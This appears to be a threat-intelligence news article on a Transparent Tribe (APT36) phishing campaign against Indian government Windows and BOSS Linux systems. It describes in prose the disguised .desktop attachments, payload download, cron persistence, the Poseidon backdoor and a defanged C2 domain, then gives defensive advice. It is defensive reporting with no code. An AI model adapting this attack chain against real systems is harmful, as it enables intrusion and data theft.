Transparent Tribe, also tracked as APT36 and believed to be of Pakistani origin, has been observed in a new campaign targeting Indian government systems. According to reports from CYFIRMA and CloudSEK, the group is exploiting both Windows and BOSS Linux environments with spear-phishing attacks that deliver weaponized desktop shortcut files. This dual-platform strategy highlights the group’s growing sophistication and ability to adapt to different environments in order to ensure compromise.

Source: bosslinux.in.
The attack chains typically start with phishing emails disguised as meeting notices. The attachments appear to be PDF documents but are actually malicious .desktop
files such as “Meeting_Ltr_ID1543ops.pdf.desktop.” Once executed, these files launch shell scripts that download and run malicious payloads. To reduce suspicion, the malware opens a decoy PDF from Google Drive in Firefox while quietly saving and executing a Go-based ELF binary retrieved from attacker infrastructure.
The binary communicates with a command-and-control server at modgovindia[.]space:4000, enabling it to fetch additional payloads, exfiltrate sensitive data, and receive attacker commands. Persistence is maintained through cron jobs that relaunch the malware after reboots. Further analysis shows that the campaign is deploying Poseidon, a Transparent Tribe backdoor capable of conducting reconnaissance, credential harvesting, and lateral movement. The malware even uses dummy anti-debugging and sandbox checks to evade security tools and analysis environments.
These latest operations come shortly after Transparent Tribe was caught targeting Indian defense institutions with spoofed domains designed to phish credentials and two-factor authentication (2FA) codes. Notably, the group has been actively targeting Kavach, the 2FA solution used by Indian government agencies, since at least 2022—further underscoring its persistence and focus on maintaining long-term access to sensitive networks.
For healthcare and medical security professionals, this campaign underscores the importance of defending against phishing-driven attacks that adapt to multiple platforms. Just like government institutions, healthcare organizations often operate in heterogeneous IT environments, making them prime targets for attackers who can tailor delivery mechanisms across systems. To reduce exposure, security teams should enforce strong email filtering, educate staff about malicious file masquerading techniques, and deploy endpoint monitoring capable of detecting persistence mechanisms like cron jobs. Multi-factor authentication should be paired with phishing-resistant methods such as FIDO2 tokens, ensuring attackers cannot easily bypass account protections with stolen credentials.